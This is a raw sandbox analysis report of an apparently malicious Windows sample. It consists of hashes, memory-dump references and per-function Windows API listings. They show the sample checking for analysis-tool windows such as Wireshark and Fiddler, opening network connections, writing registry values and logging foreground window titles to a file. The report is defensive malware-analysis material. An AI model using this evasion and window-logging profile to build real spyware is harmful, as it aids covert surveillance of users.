                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: VisibleWindow
                                                                                                  • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                  • API String ID: 1208467747-3439171801
                                                                                                  • Opcode ID: 9e0b6000161f6ef2eeb8daf8674c33bc07627c933c7ea2cd4e266ea9b2272c90
                                                                                                  • Instruction ID: 9747b58cd053d246f3cd875f7cd91938c8c9a4a397c35f50baa00c18452c2210
                                                                                                  • Opcode Fuzzy Hash: 9e0b6000161f6ef2eeb8daf8674c33bc07627c933c7ea2cd4e266ea9b2272c90
                                                                                                  • Instruction Fuzzy Hash: 514196B1E41A2175BA613531BC82FDF22495D3278BF984024EC49E0791F74AAE5DCCFA
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000064), ref: 0097455A
                                                                                                  • timeGetTime.WINMM ref: 0097457B
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0097459B
                                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009745BD
                                                                                                  • SwitchToThread.KERNEL32 ref: 009745D7
                                                                                                  • SetEvent.KERNEL32(?), ref: 00974620
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00974644
                                                                                                  • send.WS2_32(?,00987440,00000010,00000000), ref: 00974668
                                                                                                  • SetEvent.KERNEL32(?), ref: 00974686
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00974691
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 0097469F
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 009746B3
                                                                                                  • closesocket.WS2_32(?), ref: 009746BD
                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 009746F6
                                                                                                  • SetLastError.KERNEL32(000005B4), ref: 0097470A
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0098FA44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 3448239111-0
                                                                                                  • Opcode ID: 380fa51ae3a77a678d7532d7fe40152b3a1e3aacf8a2ca6863a1748a761c9938
                                                                                                  • Instruction ID: 3591f1674baa5c224707ef5b5aca23be8a49600d11a8352f12ee9f65ac0e65ae
                                                                                                  • Opcode Fuzzy Hash: 380fa51ae3a77a678d7532d7fe40152b3a1e3aacf8a2ca6863a1748a761c9938
                                                                                                  • Instruction Fuzzy Hash: 1C51FC76604A22EFC724DF64C888BA9F7A9FF45701F108129F5098BA91C774F8A4DBD0
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,02D0A8C1,?,?), ref: 02D0DA43
                                                                                                  • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,02D0A8C1,?,?), ref: 02D0DA62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452528299-0
                                                                                                  • Opcode ID: 7a4a4a4b3b4b611704144b9d8149c59e95ee61787d8bdc4364f823edf7faa43e
                                                                                                  • Instruction ID: 04e7b6443055199691acb4a7a5508b0a58c193d08e654f5cc92bc31e6ba94ee6
                                                                                                  • Opcode Fuzzy Hash: 7a4a4a4b3b4b611704144b9d8149c59e95ee61787d8bdc4364f823edf7faa43e
                                                                                                  • Instruction Fuzzy Hash: ED81CF72B002009FD720DFA9E884B6AB7E6FB58319F04456AE909C7790E7B1ED54CB90
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0C63D
                                                                                                  • _memset.LIBCMT ref: 02D0C64C
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 02D0C66F
                                                                                                    • Part of subcall function 02D0C81E: RegCloseKey.ADVAPI32(80000000,02D0C7FA), ref: 02D0C82B
                                                                                                    • Part of subcall function 02D0C81E: RegCloseKey.ADVAPI32(00000000), ref: 02D0C834
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close_memset$Open
                                                                                                  • String ID: %08X
                                                                                                  • API String ID: 4292648718-3773563069
                                                                                                  • Opcode ID: 2c66b927fee4779e78bd18516465f0d3ebf7cc5ed3b377048cbde634a57d14b3
                                                                                                  • Instruction ID: 75e1fd4dbd5ee1908bcb80eb83907e04906dcb21cad67462267db71f3a56fd92
                                                                                                  • Opcode Fuzzy Hash: 2c66b927fee4779e78bd18516465f0d3ebf7cc5ed3b377048cbde634a57d14b3
                                                                                                  • Instruction Fuzzy Hash: FD5131B2A50218ABEB24DF50DD85FEA7778EB48704F404699F705A7280D774AF48CFA4
                                                                                                  APIs
                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 02D03710
                                                                                                  • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02D03749
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02D03766
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02D03779
                                                                                                  • WSACreateEvent.WS2_32 ref: 02D0377B
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02D31F0C), ref: 02D0378D
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02D31F0C), ref: 02D03799
                                                                                                  • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02D31F0C), ref: 02D037B8
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02D31F0C), ref: 02D037C4
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 02D037D2
                                                                                                  • htons.WS2_32(?), ref: 02D037F8
                                                                                                  • WSAEventSelect.WS2_32(?,?,00000030), ref: 02D03816
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 02D0382B
                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02D31F0C), ref: 02D0383A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 1455939504-0
                                                                                                  APIs
                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 00973710
                                                                                                  • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00973749
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 00973766
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 00973779
                                                                                                  • WSACreateEvent.WS2_32 ref: 0097377B
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0098D990), ref: 0097378D
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0098D990), ref: 00973799
                                                                                                  • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0098D990), ref: 009737B8
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0098D990), ref: 009737C4
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 009737D2
                                                                                                  • htons.WS2_32(?), ref: 009737F8
                                                                                                  • WSAEventSelect.WS2_32(?,?,00000030), ref: 00973816
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 0097382B
                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0098D990), ref: 0097383A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 1455939504-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: !jWW$.$_$e$i$l${vU_
                                                                                                  • API String ID: 2102423945-159827627
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?,7A8163DF), ref: 02D0AA58
                                                                                                  • wsprintfW.USER32 ref: 02D0AA8F
                                                                                                  • _memset.LIBCMT ref: 02D0AAA7
                                                                                                  • _memset.LIBCMT ref: 02D0AABA
                                                                                                    • Part of subcall function 02D08020: lstrlenW.KERNEL32(?), ref: 02D08038
                                                                                                    • Part of subcall function 02D08020: _memset.LIBCMT ref: 02D08042
                                                                                                    • Part of subcall function 02D08020: lstrlenW.KERNEL32(?), ref: 02D0804B
                                                                                                    • Part of subcall function 02D08020: lstrlenW.KERNEL32(?), ref: 02D08056
                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D0ABBE
                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 02D0AC6E
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0ACAA
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                    • Part of subcall function 02D09730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7A8163DF,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E,00000000), ref: 02D09773
                                                                                                    • Part of subcall function 02D09730: InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E1AE,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09812
                                                                                                    • Part of subcall function 02D09730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09850
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                  • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                  • API String ID: 1254190970-1225219777
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 02D0C889
                                                                                                  • RegDeleteValueW.ADVAPI32(?), ref: 02D0C894
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0C8A4
                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 02D0C8C3
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D0C8D1
                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 02D0C8E4
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 02D0C8F2
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0C900
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                  • String ID: AppEvents$Network
                                                                                                  • API String ID: 3935456190-3733486940
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$swprintf$_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1873853019-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$swprintf$_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1873853019-0
                                                                                                  APIs
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7E81BFB0), ref: 00975A65
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00975B04
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975B42
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975B67
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00975C5F
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00975C80
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975B8C
                                                                                                    • Part of subcall function 00971280: __CxxThrowException@8.LIBCMT ref: 00971290
                                                                                                    • Part of subcall function 00971280: DeleteCriticalSection.KERNEL32(00000000,?,00987E78), ref: 009712A1
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00975CF1
                                                                                                  • timeGetTime.WINMM ref: 00975CF7
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00975D0B
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975D14
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1400036169-0
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,7A8163DF,?,?,?,?,00000000,000000FF,00000000), ref: 02D04CE6
                                                                                                  • EnterCriticalSection.KERNEL32(?,7A8163DF,?,?,?,?,00000000,000000FF,00000000), ref: 02D04D0D
                                                                                                  • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02D04D21
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02D04D28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2124651672-0
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,7E81BFB0,?,?,?,?,00000000,000000FF,00000000), ref: 00974CC6
                                                                                                  • EnterCriticalSection.KERNEL32(?,7E81BFB0,?,?,?,?,00000000,000000FF,00000000), ref: 00974CED
                                                                                                  • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 00974D01
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 00974D08
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2124651672-0
                                                                                                  • Opcode ID: 043527515987b928737e2d6287a6768b294673c81e5d012542d4c715a1732649
                                                                                                  • Instruction ID: a6f814c27aa954dda0e4183d693d07380c945d660b4c8731deba7eb38193df04
                                                                                                  • Opcode Fuzzy Hash: 043527515987b928737e2d6287a6768b294673c81e5d012542d4c715a1732649
                                                                                                  • Instruction Fuzzy Hash: 9A51B076A08A049FC721DFA8D985B6AF7F4FF88710F00452EE51ADB781E775A804CB91
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 170005318-2746444292
                                                                                                  • Opcode ID: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction ID: e531b08741d91b78134d4556acc06fa49ff396bd85f70a9d27388ab6c83f06bd
                                                                                                  • Opcode Fuzzy Hash: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction Fuzzy Hash: C951C37994032C7ADB20EB64CD85FEE73789F14704F404595E60DE6080EB70A688CFA6
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 170005318-2746444292
                                                                                                  • Opcode ID: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction ID: 7bfd9e739f20977fd8030510cee43583bdd3f500324afef1c7e9a294760c4bb2
                                                                                                  • Opcode Fuzzy Hash: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction Fuzzy Hash: DA51C6F295031EAADB20FB61CD45FEB7378AF58700F404595E609AA080EB719794CBA6
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0E751
                                                                                                  • GetForegroundWindow.USER32(?,76F923A0,00000000), ref: 02D0E759
                                                                                                  • GetWindowTextW.USER32(00000000,02D316F0,00000800), ref: 02D0E76F
                                                                                                  • _memset.LIBCMT ref: 02D0E78D
                                                                                                  • lstrlenW.KERNEL32(02D316F0,?,?,?,?,76F923A0,00000000), ref: 02D0E7AC
                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,76F923A0,00000000), ref: 02D0E7BD
                                                                                                  • wsprintfW.USER32 ref: 02D0E804
                                                                                                    • Part of subcall function 02D0E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6BD
                                                                                                    • Part of subcall function 02D0E6B0: CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6D7
                                                                                                    • Part of subcall function 02D0E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0E6F2
                                                                                                    • Part of subcall function 02D0E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 02D0E6FF
                                                                                                    • Part of subcall function 02D0E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 02D0E70A
                                                                                                    • Part of subcall function 02D0E6B0: CloseHandle.KERNEL32(00000000), ref: 02D0E711
                                                                                                    • Part of subcall function 02D0E6B0: ReleaseMutex.KERNEL32(00000000), ref: 02D0E71E
                                                                                                  • _memset.LIBCMT ref: 02D0E820
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                  • String ID: [
                                                                                                  • API String ID: 2192163267-4056885943
                                                                                                  • Opcode ID: f2392b7f64f35ef2112b540acea0f629b271d8332d66a1d6e04b3f07457853d6
                                                                                                  • Instruction ID: b322ead35781cc88d6b4f6efec02c4da7187f21c14c934d25ff1ad5e4ad22b57
                                                                                                  • Opcode Fuzzy Hash: f2392b7f64f35ef2112b540acea0f629b271d8332d66a1d6e04b3f07457853d6
                                                                                                  • Instruction Fuzzy Hash: A121B171E40129A6E7609F90EC46BBA73BDFF44700F048599B889A2380DE709D99CFE4
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 02835703
                                                                                                    • Part of subcall function 0283881A: __mtinitlocknum.LIBCMT ref: 02838830
                                                                                                    • Part of subcall function 0283881A: __amsg_exit.LIBCMT ref: 0283883C
                                                                                                  • ____lc_codepage_func.LIBCMT ref: 0283574A
                                                                                                    • Part of subcall function 0283AAD7: __getptd.LIBCMT ref: 0283AAD7
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 0283576C
                                                                                                  • _free.LIBCMT ref: 028357A3
                                                                                                  • _strlen.LIBCMT ref: 028357AA
                                                                                                  • __malloc_crt.LIBCMT ref: 028357B1
                                                                                                  • _strlen.LIBCMT ref: 028357C7
                                                                                                  • _strcpy_s.LIBCMT ref: 028357D5
                                                                                                  • __invoke_watson.LIBCMT ref: 028357EA
                                                                                                  • _free.LIBCMT ref: 028357F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__amsg_exit__getenv_helper_nolock__getptd__invoke_watson__lock__malloc_crt__mtinitlocknum_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2128035972-0
                                                                                                  • Opcode ID: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction ID: 1bb0afbdc5138e617b0b64c1400278bd58c25dc8cf3a56da0cebb7ff4c0fa8b4
                                                                                                  • Opcode Fuzzy Hash: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction Fuzzy Hash: EB91847DC012599FDB23DFA8DC819ADBBFAEF09310B64002AE544EB250D7389941CF95
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 03FB9FFF
                                                                                                    • Part of subcall function 03FBD116: __mtinitlocknum.LIBCMT ref: 03FBD12C
                                                                                                    • Part of subcall function 03FBD116: __amsg_exit.LIBCMT ref: 03FBD138
                                                                                                  • ____lc_codepage_func.LIBCMT ref: 03FBA046
                                                                                                    • Part of subcall function 03FBF3D3: __getptd.LIBCMT ref: 03FBF3D3
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 03FBA068
                                                                                                  • _free.LIBCMT ref: 03FBA09F
                                                                                                  • _strlen.LIBCMT ref: 03FBA0A6
                                                                                                  • __malloc_crt.LIBCMT ref: 03FBA0AD
                                                                                                  • _strlen.LIBCMT ref: 03FBA0C3
                                                                                                  • _strcpy_s.LIBCMT ref: 03FBA0D1
                                                                                                  • __invoke_watson.LIBCMT ref: 03FBA0E6
                                                                                                  • _free.LIBCMT ref: 03FBA0F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
